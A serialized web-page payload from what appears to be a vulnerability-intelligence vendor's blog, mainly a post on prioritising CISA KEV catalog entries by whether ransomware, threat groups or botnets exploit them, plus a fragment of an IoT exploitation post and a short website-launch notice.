attacker, whether that be a botnet or someone looking to pivot inward.",[18,118365,118366],{},"VulnCheck conducted this research as part of our interest in Initial Access vulnerabilities. 
VulnCheck has developed proof of concept scanners and exploits, generated PCAPs, and created Suricata rules for all of the mentioned Xiongmai vulnerabilities for our Initial Access Intelligence customers.",[2901,118368,118369],{},"
",{"title":219,"searchDepth":220,"depth":220,"links":118371},[118372,118373,118374,118375,118376],{"id":116327,"depth":220,"text":116328},{"id":117101,"depth":220,"text":117102},{"id":117501,"depth":220,"text":117502},{"id":117574,"depth":220,"text":117575},{"id":118359,"depth":220,"text":118360},"An examination of vulnerabilities affecting Xiongmai IoT devices, including exploit development and an analysis of exploitation in the wild.",{"slug":118379,"category":115663},"xiongmai-iot-exploitation","\u002Fblog\u002Fxiongmai-iot-exploitation",{"title":81971,"description":118377},"blog\u002Fxiongmai-iot-exploitation",[23275,1279],"dHV_Kl8Iz245OSrVTRhRgqI_UGuA5Qick7DoJrNjpfw",{"id":118386,"title":107335,"articles":7,"authors":118387,"body":118389,"date":118742,"description":118743,"extension":234,"image":7,"link":7,"meta":118744,"navigation":237,"path":118746,"seo":118747,"series":7,"stem":118748,"subtype":7,"tags":118749,"__hash__":118750},"blog\u002Fblog\u002Fkev-prioritization.md",[118388],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":118390,"toc":118732},[118391,118406,118412,118416,118431,118444,118449,118453,118471,118478,118481,118491,118503,118523,118531,118534,118547,118551,118553,118556,118561,118565,118568,118573,118577,118604,118610,118614,118621,118635,118638,118642,118666,118684,118688,118691,118710,118712,118725,118729],[18,118392,118393,118394,118397,118398,118405],{},"The CISA Known Exploited Vulnerabilities (KEV) Catalog (",[47,118395,82007],{"href":82007,"rel":118396},[51],") tracks vulnerabilities that have been exploited in the wild, and it currently has more than 850 entries. 
New entries are added to the Catalog at a regular clip, but as the Catalog continues to grow, it's become increasingly difficult for those not bound to the ",[1131,118399,118400],{},[47,118401,118404],{"href":118402,"rel":118403},"https:\u002F\u002Fwww.cisa.gov\u002Fbinding-operational-directive-22-01",[51],"Binding Operational Directive 22-01"," to determine the significance of each KEV entry and how they should be prioritized for remediation.",[18,118407,118408,118409,118411],{},"In this blog, we'll tackle the KEV prioritization problem head-on. We'll identify a small subset of KEV entries that should be remediated now because they pose the highest risk. Then we'll identify another group of high-risk KEV entries that should be remediated next. We'll achieve this prioritization by identifying ",[1131,118410,106141],{}," is exploiting these vulnerabilities.",[1920,118413,118415],{"id":118414},"focusing-on-initial-access","Focusing on Initial Access",[18,118417,118418,118419,118424,118425,118430],{},"Local vulnerabilities make up 23% of the KEV Catalog. Attackers exploit local vulnerabilities to ",[47,118420,118423],{"href":118421,"rel":118422},"https:\u002F\u002Fattack.mitre.org\u002Ftactics\u002FTA0004\u002F",[51],"escalate privileges"," or trigger ",[47,118426,118429],{"href":118427,"rel":118428},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1566\u002F",[51],"phishing"," payloads. But these vulnerabilities are only useful if the attacker has already breached a network or tricked a user into interacting with malicious content.",[18,118432,118433,118434,118439,118440,118443],{},"Far more concerning are remote vulnerabilities that don't require authentication or user interaction. When used against ",[47,118435,118438],{"href":118436,"rel":118437},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1190\u002F",[51],"public-facing systems",", these kinds of vulnerabilities are great ",[47,118441,2942],{"href":41541,"rel":118442},[51]," vectors. 
Attackers that exploit public-facing systems are often able to use the exploited system as a beachhead into the victim's internal network. Obviously, that's a great position for an attacker and a very dangerous situation for the victim. And given that high value, it's unsurprising that initial access vulnerabilities make up about 37% of the KEV Catalog.",[1925,118445,118446],{},[18,118447,118448],{},"CISA KEV Catalog Sorted By Vulnerability Type",[78559,118450],{":labels":118451,":values":118452},"[\"Initial Access\",\"Credentialed Initial Access\",\"Information Leak\",\"Denial of Service\",\"Client-Side\",\"Local\",\"Other\"]","[36.7,9.3,4,3.9,30.2,14.8,1.1]",[18,118454,118455,118456,1246,118461,118466,118467,59],{},"These types of public-facing initial access vulnerabilities can also be exploited at scale. That's especially useful when the attacker's business model relies on volume. Recent examples of mass exploitation of initial access vulnerabilities include Confluence's ",[47,118457,118460],{"href":118458,"rel":118459},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26134",[51],"CVE-2022-26134",[47,118462,118465],{"href":118463,"rel":118464},"https:\u002F\u002Fwww.mandiant.com\u002Fresources\u002Fblog\u002Fmobileiron-log4shell-exploitation",[51],"log4shell",", and the ",[47,118468,118470],{"href":91971,"rel":118469},[51],"ProxyShell vulnerabilities",[18,118472,118473,118474,118477],{},"So it's clear that internet-accessible vulnerabilities pose a serious risk, one that ",[1131,118475,118476],{},"exceeds"," other attack vectors. Both phishing and social engineering also pose significant risk, but those vectors rely on human behavior and have a slew of other mitigations outside of the vulnerability management process. 
As such, prioritizing the remediation of initial access vulnerabilities, over all others, is a reasonable method to reduce risk via vulnerability management.",[18,118479,118480],{},"Focusing on initial access vulnerabilities also allows us to de-prioritize more than 60% of the KEV Catalog. That's a good start, but still an unwieldy number of issues. Let's reduce the list even further!",[61,118482,118484,982,118487,118490],{"id":118483},"who-and-why-matters",[1131,118485,118486],{},"Who",[1131,118488,118489],{},"Why"," Matters",[18,118492,118493,118494,118496,118497,118499,118500,118502],{},"Treating every exploited-in-the-wild vulnerability as if each represents the same amount of risk is obviously incorrect. Knowing ",[1131,118495,106141],{}," is doing the exploitation and ",[1131,118498,13220],{}," are crucial in determining that risk. While the KEV Catalog doesn't provide these details, the VulnCheck Vulnerability Intelligence Feed ",[1131,118501,4563],{},". Based on our intelligence, we can sort the KEV Catalog's initial access vulnerabilities into six groups, descending in priority:",[1789,118504,118505,118508,118511,118514,118517,118520],{},[25,118506,118507],{},"Vulnerabilities used by ransomware",[25,118509,118510],{},"Vulnerabilities used by advanced threat groups",[25,118512,118513],{},"Vulnerabilities used by botnets",[25,118515,118516],{},"Vulnerabilities with weaponized exploits but no publicly reported exploitation",[25,118518,118519],{},"Vulnerabilities with proof of concept exploits but no publicly reported exploitation",[25,118521,118522],{},"Vulnerabilities with neither an exploit nor publicly reported exploitation details",[18,118524,118525,118526,118530],{},"The preceding list attempts to sort the vulnerabilities by risk. 
Ransomware vulnerabilities pose the most risk because exploitation can rapidly halt business operations, cost thousands to millions of dollars, and even ",[47,118527,85160],{"href":118528,"rel":118529},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Flincoln-college-to-close-after-157-years-due-ransomware-attack\u002F",[51]," the victim's business. Remediating vulnerabilities known to be used by ransomware should be a vulnerability management program's top priority.",[18,118532,118533],{},"Vulnerabilities used by advanced threat groups and botnets pose the next-highest risk because they can result in data loss, intellectual property loss, and significant reputational harm. Ideally, these vulnerabilities would be prioritized next.",[18,118535,118536,118537,118540,118541,118543,118544,118546],{},"The remaining vulnerabilities only pose a high ",[1131,118538,118539],{},"potential"," risk. Many of these vulnerabilities have public exploits, but have no reliable reporting tying them to ransomware, advanced threat groups, or botnets. Their inclusion in the KEV Catalog ",[1131,118542,4563],{}," indicate they may have been used somewhere, but the lack of further details implies very small-scale exploitation or low-impact results for the attacker. 
These vulnerabilities shouldn't necessarily be ignored, but they don't rank alongside vulnerabilities that ",[1131,118545,1133],{}," known to be impactful.",[1920,118548,118550],{"id":118549},"the-breakdown","The Breakdown",[993,118552,331],{"id":91950},[18,118554,118555],{},"Breaking down the initial access vulnerabilities in the KEV Catalog and sorting them into the various groups mentioned in the previous section results in the following chart:",[1925,118557,118558],{},[18,118559,118560],{},"CISA KEV Initial Access Vulnerabilities Sorted By Highest Risk",[78559,118562],{":labels":118563,":values":118564},"[\"Ransomware\",\"Named Threat Actor\",\"Botnet\",\"Mature Exploit\",\"Proof of Concept Exploit\",\"Limited Information\"]","[33.5,16.3,14.7,23.3,7.1,5.1]",[18,118566,118567],{},"The graph shows that the immediate priority, ransomware vulnerabilities, only make up 34% of the KEV Catalog Initial Access vulnerabilities. That's about 100 vulnerabilities, a significant reduction from the more than 850 we started with. But, some of the 100 vulnerabilities are quite old, so we looked at further reducing this number based on age.",[1925,118569,118570],{},[18,118571,118572],{},"Ransomware Vulnerabilities by Year",[11128,118574],{":labels":118575,":values":118576},"[2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022]","[2,0,5,6,2,5,3,11,14,16,10,26,6]",[18,118578,118579,118580,118585,118586,118591,118592,118594,118595,982,118599,118603],{},"However, we quickly found most of them are still relevant. Take, for example, the oldest vulnerability in the list, JBoss's ",[47,118581,118584],{"href":118582,"rel":118583},"https:\u002F\u002Fcve.mitre.org\u002Fcgi-bin\u002Fcvename.cgi?name=cve-2010-0738",[51],"CVE-2010-0738",". 
Although this vulnerability has been public for over a decade, has been presented in ",[47,118587,118590],{"href":118588,"rel":118589},"https:\u002F\u002Fowasp.org\u002Fwww-pdf-archive\u002FOWASP3011_Luca.pdf",[51],"talks",", and has quite a few public exploits, we can ",[295,118593,103898],{}," find likely vulnerable targets on both ",[47,118596,65549],{"href":118597,"rel":118598},"https:\u002F\u002Fwww.google.com\u002Fsearch?q=intitle%3A%E2%80%9DJBoss+Management+Console+%E2%80%93+Server+Information%E2%80%9D+%E2%80%9Capplication+server%E2%80%9D+inurl%3A%E2%80%9Dweb-console%E2%80%9D+OR+inurl%3A%E2%80%9Djmx-console%E2%80%9D",[51],[47,118600,41731],{"href":118601,"rel":118602},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%2B%22SVNTag%3DJBoss%22+%2Bhtml%3A%22%2Fjmx-console%2F%22++title%3A%22Welcome+to+JBoss%22",[51],". For whatever reason, it seems like a lot of these 100 vulnerabilities are still hanging around the internet, which means we have to keep them in our prioritization list.",[18,118605,118606],{},[68,118607],{":width":10862,"alt":118608,"src":118609},"shodan_jboss","https:\u002F\u002Fuser-images.githubusercontent.com\u002F113205286\u002F192303149-3561edbd-9038-424c-86be-0e2b2068f553.png",[993,118611,118613],{"id":118612},"advanced-threat-groups-and-botnets","Advanced Threat Groups and Botnets",[18,118615,118616,118617,118620],{},"Vulnerabilities used by advanced threat groups and botnets represent 16% and 15% of the KEV Catalog initial access vulnerabilities. Interestingly, the vulnerabilities in these categories could typically be used by ransomware crews, but, for whatever reason, simply aren't. 
For example, ",[47,118618,92074],{"href":92072,"rel":118619},[51]," is a widely exploited vulnerability affecting F5 BigIP, but we have no intelligence suggesting it was abused by ransomware (at the time of writing).",[18,118622,118623,118624,982,118629,118634],{},"The botnet category is more likely to contain IoT-based vulnerabilities such as ",[47,118625,118628],{"href":118626,"rel":118627},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26258",[51],"CVE-2022-26258",[47,118630,118633],{"href":118631,"rel":118632},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-3929",[51],"CVE-2019-3929",". Again, these vulnerabilities can provide access into victim networks, but they seem to be used mostly by Mirai-variant botnets such as Moobot.",[18,118636,118637],{},"Remediating ransomware vulnerabilities is important, but it should be kept in mind that many of the vulnerabilities in this category can be picked up by ransomware crews at any time. And, of course, as discussed earlier, advanced threat groups and botnets also pose a significant risk. This category is a great \"next\" if your vulnerability management program has caught up on all known ransomware vectors.",[993,118639,118641],{"id":118640},"exploits-exists","Exploits Exist",[18,118643,118644,118645,118647,118648,118653,118654,118659,118660,118662,118663,118665],{},"Vulnerabilities used by ransomware, advanced threat groups, and botnets pose a real and immediate risk, but those vulnerabilities only make up about half of the initial access vulnerabilities in the KEV Catalog. The remaining vulnerabilities are only ",[1131,118646,118539],{}," risks because there is no reliable public reporting about their use in the wild. The potential risk varies, though. 
For example, ",[47,118649,118652],{"href":118650,"rel":118651},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-4427",[51],"CVE-2020-4427"," has a fully weaponized public exploit in the ",[47,118655,118658],{"href":118656,"rel":118657},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F1499b1988e0f6c6cb541e715cf7a3dc43d5563f3\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fibm_drm_rce.rb",[51],"Metasploit Framework",". Metasploit is an open-source advanced exploitation tool, and anyone can use it. There is nothing stopping attackers from using the Metasploit module for CVE-2020-4427 on public-facing servers. But there is no reporting that any group has. So that's a clear high ",[1131,118661,118539],{}," risk, but it doesn't reach the level of a ",[1131,118664,103548],{}," high risk.",[18,118667,118668,118669,118674,118675,118680,118681,118683],{},"Even lower on our risk assessment are vulnerabilities that only have proof of concept exploits. For example, ",[47,118670,118673],{"href":118671,"rel":118672},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-40870",[51],"CVE-2021-40870"," has a handful of public proof of concept exploits, including a ",[47,118676,118679],{"href":118677,"rel":118678},"https:\u002F\u002Fwearetradecraft.com\u002Fadvisories\u002Ftc-2021-0002\u002F",[51],"curl-based exploit"," published by the vulnerability discoverer. Again, anyone can use these exploits, but they lack the true weaponization we expect from real-world exploit kits. An attacker would need to take on some work in order to integrate the proof of concept exploits into their tool belt. As such, these are more of a medium ",[1131,118682,118539],{}," risk and are far less likely to see any type of exploitation at scale.",[993,118685,118687],{"id":118686},"no-exploit-no-reliable-reporting","No Exploit. 
No Reliable Reporting",[18,118689,118690],{},"The final grouping of vulnerabilities in our prioritization list consists of the vulnerabilities that don't have a known exploit and for which there's no public information regarding use in the wild. While KEV Catalog entries should always be taken seriously, the lack of contextualization around these vulnerabilities makes them very difficult to prioritize. Given the lack of details, it's assumed these vulnerabilities are either not being actively exploited or were used in targeted attacks against a minimal number of targets.",[18,118692,118693,118694,118699,118700,118705,118706,118709],{},"An example of an entry in this group is ",[47,118695,118698],{"href":118696,"rel":118697},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-37415",[51],"CVE-2021-37415",", affecting ManageEngine ServiceDesk Plus. While ManageEngine software is certainly ",[47,118701,118704],{"href":118702,"rel":118703},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fstate-hackers-breach-defense-energy-healthcare-orgs-worldwide\u002F",[51],"familiar"," to a wide array of attackers, this particular issue has almost no associated information. Keeping ManageEngine software up to date is obviously a good thing, but it shouldn't take precedence over vulnerabilities that we ",[1131,118707,118708],{},"know"," are being exploited.",[1920,118711,1903],{"id":1902},[18,118713,118714,118715,118719,118720,982,118722,118724],{},"The CISA KEV Catalog contains hundreds of vulnerabilities that pose serious risk. But the Catalog lacks prioritization and, as it continues to grow, becomes increasingly unwieldy for security practitioners to use for remediation purposes. In this blog, we were able to identify approximately 10% of the KEV Catalog vulnerabilities as requiring immediate remediation, a number that is far more manageable for practitioners. 
We also identified an additional 16% of vulnerabilities that should be considered as the ",[47,118716,25220],{"href":118717,"rel":118718},"https:\u002F\u002Fdale-peterson.com\u002F2019\u002F02\u002F14\u002Fics-security-patching-never-next-now\u002F",[51]," vulnerabilities to remediate. We were able to achieve this by using vulnerability intelligence to determine ",[1131,118721,106141],{},[1131,118723,13220],{}," these vulnerabilities are being exploited.",[61,118726,118728],{"id":118727},"about-the-data","About the Data",[18,118730,118731],{},"The data presented in this blog was produced using the VulnCheck Vulnerability Intelligence Feed. The data was compiled on November 14, 2022.",{"title":219,"searchDepth":220,"depth":220,"links":118733},[118734,118741],{"id":118483,"depth":220,"text":118735,"children":118736},"Who and Why Matters",[118737,118738,118739,118740],{"id":91950,"depth":1266,"text":331},{"id":118612,"depth":1266,"text":118613},{"id":118640,"depth":1266,"text":118641},{"id":118686,"depth":1266,"text":118687},{"id":118727,"depth":220,"text":118728},"2022-11-14","The CISA Known Exploited Vulnerabilities (KEV) Catalog tracks vulnerabilities that have been exploited in the wild, and it currently has more than 800 entries.",{"slug":118745},"kev-prioritization","\u002Fblog\u002Fkev-prioritization",{"title":107335,"description":118743},"blog\u002Fkev-prioritization",[1279],"RbuvzpJIs27aXZPqy8ZL5ya5VrX4mKhSwd7OR3rL8S4",{"id":118752,"title":118753,"articles":7,"authors":118754,"body":118757,"date":118767,"description":118768,"extension":234,"image":7,"link":7,"meta":118769,"navigation":237,"path":118771,"seo":118772,"series":7,"stem":118773,"subtype":7,"tags":7,"__hash__":118774},"blog\u002Fblog\u002Fwebsite-launch.md","Website Launch",[118755],{"name":69301,"avatar":118756},"https:\u002F\u002Fvulncheck.com\u002Flogo.png",{"type":15,"value":118758,"toc":118765},[118759,118762],[18,118760,118761],{},"Since starting VulnCheck in the early days of the pandemic, we've 
kept a low profile. Early on, we had the opportunity to work with some great customers, to solve some of the toughest problems in cybersecurity, and it required absolute focus.",[18,118763,118764],{},"As we've been consistently growing our customer base quarter over quarter for a while now, it felt appropriate to get the website launched, and to start telling the world more about the problems we're solving at VulnCheck. If you're an organization struggling with vulnerability prioritization and staying on top of the latest vulnerabilities, reach out to VulnCheck today.",{"title":219,"searchDepth":220,"depth":220,"links":118766},[],"2022-11-12","We've been around, supporting our customers since 2021, but only recently launched our website.",{"slug":118770},"website-launch","\u002Fblog\u002Fwebsite-launch",{"title":118753,"description":118768},"blog\u002Fwebsite-launch","EfoFeau3__R0jApOcFeuDoroqXnUWMmgadlvEgEIRjc",1781040387428]